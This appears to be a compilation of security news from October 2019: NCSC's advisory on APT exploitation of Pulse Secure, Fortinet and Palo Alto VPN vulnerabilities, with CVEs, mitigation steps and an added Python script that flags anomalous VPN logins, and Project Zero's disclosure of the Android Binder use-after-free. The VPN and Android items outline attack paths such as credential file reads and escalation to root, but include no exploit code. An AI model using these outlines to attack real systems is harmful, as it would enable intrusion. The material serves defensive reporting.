The open letter to Facebook also did not sit well with many users. In a discussion on Hacker News, users argued that it would be wrong to undermine security for millions of law-abiding users in order to investigate wrongdoers. One user commented, “Privacy isn't a trade-off against security, it's a necessary component of having security.” Another user added, “Criminal activities are exacerbated by the internet it would be a lie to say no. But just like with cars, scooters, or any tech that's sufficiently democratized. They need a permit for a car? Why not just steal it? I need an identity to do shady stuff on the internet? Why not steal it? We cannot reason with malevolent forces, there is always going to be a way. And by that time, we compiled the data of everyone, centralized it all, and let govs that don't understand the implication collect those as if it was mere petrol or gold. We are putting everyone's lives at risk doing so, just wait until it leaks out or it starts getting sold. (ahem, oh wait !)”

Read the open letter to Facebook for more details.

NCSC investigates several vulnerabilities in VPN products from Pulse secure, Palo Alto and Fortinet

Fatema Patrawala
07 Oct 2019
3 min read
Last week, the National Cyber Security Centre (NCSC) reported that it is investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities in VPN products from vendors including Pulse Secure, Palo Alto and Fortinet. This is ongoing activity targeting UK and other international organizations. According to NCSC, affected sectors include government, military, academic, business and healthcare.

Vulnerabilities exist in several SSL VPN products

As per the report, vulnerabilities exist in several SSL VPN products that allow an attacker to retrieve arbitrary files containing authentication credentials. An attacker can use these stolen credentials to connect to the VPN and change configuration settings, or to connect onward to internal infrastructure. The report also highlights that an unauthorized connection to a VPN can provide the attacker with the privileges needed to run secondary exploits aimed at obtaining a root shell.

Read Also: MITRE’s 2019 CWE Top 25 most dangerous software errors list released

Top vulnerabilities in VPN products exploited by APTs

The highest-impact vulnerabilities known to be exploited by APTs are listed below.

Pulse Connect Secure:
  • CVE-2019-11510: Pre-auth arbitrary file reading
  • CVE-2019-11539: Post-auth command injection

Fortinet:
  • CVE-2018-13379: Pre-auth arbitrary file reading
  • CVE-2018-13382: Allows an unauthenticated attacker to change the password of an SSL VPN web portal user
  • CVE-2018-13383: Post-auth heap overflow. This allows an attacker to gain a shell running on the router

Palo Alto:
  • CVE-2019-1579: Palo Alto Networks GlobalProtect Portal

NCSC suggests that users of these VPN products investigate their logs for evidence of compromise, especially if the security patches were not applied immediately after their release. Additionally, administrators should look for evidence of compromised accounts in active use, such as logins from anomalous IP locations or at anomalous times. The report also covers product-specific advice for detecting exploitation in VPN connections.

Steps to mitigate the vulnerabilities in VPN products

NCSC provides essential steps to mitigate the risk of these vulnerabilities. It suggests that owners of vulnerable products promptly take two steps:
  • Apply the latest security patches released by vendors
  • Reset authentication credentials associated with affected VPNs and accounts connecting through them

The most effective way to mitigate the risk of actors exploiting these vulnerabilities is to ensure that the affected products are patched with the latest security updates. Pulse Secure, Palo Alto and Fortinet have released patches for these vulnerabilities. NCSC also encourages reporting any current activity related to these threats to [email protected], where it will offer help and guidance.

On Hacker News, the report has gained significant traction, with users discussing the nature of various VPN products and services. One of them commented, “Commercial enterprise VPN products are an open sewer, and there aren't any, from any vendor, that I trust. I don't like OpenVPN or strongSwan, but you'd be better off with either of them than you would be with a commercial VPN appliance. The gold standard, as ever, is Wireguard.”

To know more about this report, check out the official NCSC website.
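As an added example (not from the NCSC report or any vendor's tooling), the following Python sketch implements the log review NCSC recommends: it builds a per-user baseline of login countries from successful logins before a cutoff date, then flags later successful VPN logins from a country absent from that baseline or outside an assumed working-hours window, and lists the accounts whose credentials should be reset. The log format, field names, IP addresses, the cutoff and the working-hours window are all constructed for the example.

```python
"""Review VPN authentication logs for signs of compromised accounts in active use.

Added example; the log format is constructed for illustration and is not the
output of any real VPN appliance. Baseline = successful logins before the cutoff
(for instance the date the vendor patch was published); later logins from a
country the user never used before, or outside normal hours, are flagged.
"""
from collections import defaultdict
from datetime import datetime, time

# Constructed sample log: documentation-range IPs, hypothetical field names.
SAMPLE_LOG = """\
2019-09-30T08:12:44Z user=alice src=203.0.113.10 geo=GB result=success
2019-09-30T09:03:10Z user=bob src=198.51.100.7 geo=GB result=success
2019-10-01T08:47:02Z user=alice src=203.0.113.10 geo=GB result=success
2019-10-02T03:15:51Z user=alice src=192.0.2.44 geo=RU result=success
2019-10-02T10:22:09Z user=bob src=198.51.100.7 geo=GB result=success
2019-10-03T23:58:31Z user=bob src=192.0.2.99 geo=CN result=failure
2019-10-04T00:04:12Z user=bob src=192.0.2.99 geo=CN result=success
"""

# Assumed normal login window in UTC; tune to the organisation's working hours.
WORK_START, WORK_END = time(7, 0), time(20, 0)
TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse_line(line):
    """Turn 'timestamp key=value key=value ...' into a dict with a parsed timestamp."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.strptime(ts, TS_FORMAT)
    return rec


def baseline_geos(records, cutoff):
    """Countries each user successfully logged in from before the cutoff."""
    seen = defaultdict(set)
    for r in records:
        if r["ts"] < cutoff and r["result"] == "success":
            seen[r["user"]].add(r["geo"])
    return seen


def find_anomalies(log_text, cutoff_ts):
    """Return (user, timestamp, src, reasons) for suspicious post-cutoff logins."""
    cutoff = datetime.strptime(cutoff_ts, TS_FORMAT)
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    baseline = baseline_geos(records, cutoff)
    findings = []
    for r in records:
        # Only successful logins after the cutoff indicate an account in active
        # use; failed attempts are out of scope for this particular check.
        if r["ts"] < cutoff or r["result"] != "success":
            continue
        reasons = []
        if r["geo"] not in baseline.get(r["user"], set()):
            reasons.append(f"new country {r['geo']}")
        if not WORK_START <= r["ts"].time() <= WORK_END:
            reasons.append("off-hours")
        if reasons:
            findings.append((r["user"], r["ts"].isoformat(), r["src"], reasons))
    return findings


def accounts_to_reset(findings):
    """Accounts whose credentials should be reset after triage (NCSC's second step)."""
    return sorted({user for user, _, _, _ in findings})


def run_example():
    """Constructed cutoff standing in for the day the vendor patches were released."""
    return find_anomalies(SAMPLE_LOG, "2019-10-02T00:00:00Z")


if __name__ == "__main__":
    found = run_example()
    for user, ts, src, reasons in found:
        print(f"{ts} {user} from {src}: {', '.join(reasons)}")
    print("reset credentials for:", ", ".join(accounts_to_reset(found)))
```

A geo field is rarely present in raw appliance logs; in practice it would be joined in from an IP geolocation lookup before this step.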


Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices

Sugandha Lahoti
07 Oct 2019
3 min read
Google’s Project Zero disclosed a zero-day Android exploit in popular devices from Pixel, Huawei, Xiaomi, and Samsung last Friday. The flaw yields root-level access and requires no or minimal customization to root a phone exposed to the bug. A similar Android OS flaw was fixed in 2017, but it has now found its way into newer software versions as well. The researchers speculate that use of this vulnerability is attributable to the Israel-based NSO Group. Google has published a proof of concept, which it describes as a kernel privilege escalation that uses a ‘use-after-free’ vulnerability accessible from inside the Chrome sandbox.

How does the zero-day Android exploit work

As described in the upstream commit, “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.” Basically, the exploit can gain arbitrary kernel read/write when running locally. If delivered via the web, it only needs to be paired with a renderer exploit, as the vulnerability is reachable from the sandbox. The vulnerability is exploitable from Chrome's renderer processes under Android's 'isolated_app' SELinux domain, making Binder the vulnerable component.

Affected devices include Pixel, Pixel XL, Pixel 2, Pixel 2 XL, Huawei P20, Redmi 5A, Redmi Note 5, Mi A1, Oppo A3, Moto Z3, LG phones running Oreo, Samsung Galaxy S7, Samsung Galaxy S8, and Samsung Galaxy S9. The vulnerability was patched earlier in Linux kernel version 4.14 and above, but without a CVE. It is now tracked as CVE-2019-2215.

“This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” Project Zero member Tim Willis wrote in the post.

Project Zero normally gives developers 90 days to fix an issue before making it public, but since this vulnerability was being exploited in the wild, it was published after just seven days: once 7 days elapse or a patch is made broadly available (whichever is earlier), the bug report becomes visible to the public. Google said that affected Pixel devices will have the zero-day Android exploit patched in the upcoming October 2019 Android security update. Other OEMs have not yet acknowledged the vulnerability, but should ideally release patches soon.